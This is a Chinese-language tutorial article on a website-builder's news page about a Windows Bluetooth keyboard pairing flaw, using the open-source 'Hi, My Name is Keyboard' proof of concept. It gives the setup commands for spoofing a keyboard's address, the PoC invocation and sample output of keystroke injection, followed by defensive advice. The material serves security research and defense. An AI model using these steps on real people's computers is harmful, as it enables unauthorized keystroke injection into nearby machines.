恒美微站 Logo 恒美微站
  • 首页
  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心
  • 联系我们

Windows蓝牙键盘漏洞深度剖析:Hi, My Name is Keyboard实战教程

  • 首页
  • 资讯中心
  • /
  • Windows蓝牙键盘漏洞深度剖析:Hi, My Name is Keyboard实战教程

相关资讯

如何在iOS项目中集成RSBarcodes_Swift?3分钟快速上手教程 2026/9/28 5:53:49
Fody与MSBuild集成指南:让IL编织无缝融入你的开发流程 2026/8/2 19:09:12
Android-Rate完全指南:如何提升应用评分的终极策略 2026/8/2 19:09:12

最新资讯

Windows操作系统基础安全加固:账号权限、端口防护与日志审计实战
Windows基础安全加固:从账户权限到日志审计的完整实践
通用RBAC权限系统设计实战:从表结构到按钮级权限
AI重构租赁管理:从合同解析到智能决策的实战指南
立创EDA正则表达式批量修改PCB丝印大小实战指南
CTF逆向实战:IDA快速定位主函数与加密逻辑识别技巧

今日推荐

婚恋网站实战案例:避开3个高价坑,省钱50%还能跑赢流量
制作网页比较方便的软件怎么选?一文搞懂避坑指南
BootCamp6.1.7071驱动包手动安装与回滚全攻略

本周热门

从像素到笔画:srt-whiteboard-animation骨架笔迹追踪实现(Zhang-Suen细化+8邻接追踪)
网站建设的英语怎么说?别只背单词,看完这套安全完整流程才敢上线
新手入门看这篇:建设网站加盟避坑指南与SEO实操

本月精选

自研推理加速器Redwood:两周内实现PyTorch模型高效部署的实战教程
V4L2摄像头采集实战:从camera_client.rar到出图全流程解析
从“谁发明了钢琴键”到知识问答智能体:RAG与记忆工程实践

Windows蓝牙键盘漏洞深度剖析:Hi, My Name is Keyboard实战教程

发布时间:2026/9/28 5:54:20
Windows蓝牙键盘漏洞深度剖析:Hi, My Name is Keyboard实战教程 Windows蓝牙键盘漏洞深度剖析Hi, My Name is Keyboard实战教程【免费下载链接】hi_my_name_is_keyboard项目地址: https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboardHi, My Name is Keyboard项目是一个专注于蓝牙键盘安全研究的开源项目包含多个操作系统的蓝牙键盘漏洞利用PoC脚本。本文将深入解析Windows系统中的蓝牙键盘漏洞通过实战演示帮助你了解漏洞原理、攻击过程及防御方法。漏洞原理Windows蓝牙键盘安全隐患当Windows电脑与蓝牙键盘配对后若原键盘关闭或超出连接范围攻击者可通过物理接近的方式利用Ubuntu电脑和博通蓝牙适配器伪造目标键盘地址并连接到Windows的L2CAP 17端口。此时受害者会看到“Add a device”通知即便点击取消或关闭配对对话框攻击者仍能完成配对并注入任意按键这就是Windows蓝牙键盘漏洞的核心风险。图Linux系统蓝牙设置界面展示了设备配对状态漏洞利用条件与环境准备漏洞利用条件Windows电脑已与蓝牙键盘配对且原键盘处于关闭或超出范围状态攻击者需在物理上接近目标设备使用博通蓝牙适配器的Ubuntu 22.04电脑环境准备步骤首先克隆项目仓库git clone https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboard然后安装依赖sudo apt-get update sudo apt-get -y upgrade sudo apt install -y bluez-tools bluez-hcidump git python3-pip python3-setuptools libbluetooth-dev sudo sed -i s|ExecStart/usr/lib/bluetooth/bluetoothd|ExecStart/usr/lib/bluetooth/bluetoothd --compat|g /lib/systemd/system/bluetooth.service sudo systemctl daemon-reload sudo systemctl restart bluetooth git clone https://github.com/pybluez/pybluez.git cd pybluez sudo python3 setup.py install python3 -m pip install pydbus cd ~ git clone https://github.com/bluez/bluez.git cd bluez gcc -o bdaddr tools/bdaddr.c src/oui.c -lbluetooth -I. sudo cp bdaddr /usr/local/bin/实战演示Windows蓝牙键盘攻击过程攻击步骤将蓝牙键盘与目标Windows电脑配对然后关闭键盘在Ubuntu电脑上运行PoC脚本./windows-poc.py -i Interface -k Keyboard-Address -c Windows-Address当Windows电脑出现通知时点击它关闭配对请求对话框或点击取消或批准成功后Ubuntu机器将连接到Windows并注入5秒的tab按键示例输出$ ./windows-poc.py -i hci0 -k 3C:A6:F6:EC:5B:ED -c 04:33:C2:19:CD:3B Manufacturer: Broadcom Corporation (15) Device address: 12:34:56:78:9A:BC New BD address: 3C:A6:F6:EC:5B:ED Address changed - Reset device now HID keyboard service registered NoInputNoOutput pairing-agent running connecting to PSM 17 successfully connected to PSM 17 (HID Control) connecting to PSM 19 successfully connected to PSM 19 (HID Interrupt) injecting 5 seconds of tab keypresses图macOS桌面界面展示了攻击可能发生的环境漏洞防御保护你的Windows设备临时防御措施保持蓝牙键盘处于开启状态减少被攻击窗口及时关闭不使用的蓝牙功能谨慎对待蓝牙配对请求遇到不明配对请求时选择拒绝长期解决方案安装系统安全更新微软已针对此漏洞发布相关补丁使用USB有线键盘替代蓝牙键盘启用Windows防火墙和安全软件增强系统防护能力漏洞技术细节与PoC分析LMP竞争条件在链接建立过程中存在竞争条件Ubuntu和Windows电脑会同时尝试启用链接加密。配对通常在1-2秒内完成但可能需要长达15-30秒。通过对攻击者内核中的hci_event.c进行小补丁可以缓解此竞争条件。PoC脚本解析PoC脚本windows-poc.py实现了完整的攻击流程包括地址伪造、服务注册、配对请求处理和按键注入等功能。脚本通过伪造蓝牙键盘地址利用Windows蓝牙配对机制的漏洞实现了未经授权的按键注入。总结与展望Windows蓝牙键盘漏洞展示了物理接近攻击的潜在风险。通过本文的解析和实战演示你已经了解了漏洞的原理、利用方法和防御措施。建议普通用户保持系统更新安全从业者可以通过windows-report.md深入研究漏洞细节共同提升蓝牙设备的安全性。随着蓝牙技术的广泛应用设备安全问题日益凸显。Hi, My Name is Keyboard项目为安全研究人员提供了宝贵的测试工具有助于推动蓝牙安全技术的发展和完善。【免费下载链接】hi_my_name_is_keyboard项目地址: https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboard创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

关于恒美微站

恒美微站专注于为个体商户、工作室提供极简自助建站服务,让每个人都能轻松拥有专业网站。

快速链接

  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心

服务项目

  • 可视化建站
  • 拖拽编辑
  • 主题定制
  • SEO 优化
  • 网站托管

联系方式

  • 📍 地址:北京市朝阳区建国路 88 号
  • 📞 电话:400-888-8888
  • ✉️ 邮箱:info@hmyw.cn
  • 🕐 时间:周一至周日 9:00-18:00

© 2024 恒美微站 hmyw.cn 版权所有 | 京 ICP 备 12345678 号